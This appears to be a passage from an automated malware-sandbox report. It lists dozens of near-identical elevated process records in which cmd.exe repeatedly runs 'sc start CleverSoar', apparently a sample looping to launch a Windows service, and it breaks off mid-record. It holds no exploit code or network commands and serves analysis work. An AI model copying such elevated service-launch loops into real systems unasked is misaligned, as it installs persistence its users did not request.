                                                        Target ID:19
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:33
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:34
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:35
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:38
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:39
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:43
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:44
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:47
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:50
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:51
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:52
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:53
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:54
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:55
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:56
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:57
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:58
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:59
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:60
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:61
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:62
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:63
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:64
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:65
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:66
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:67
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:68
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:69
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:70
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:71
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:72
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:73
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:74
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:75
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:76
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:77
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:78
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:79
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:80
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:81
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:82
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
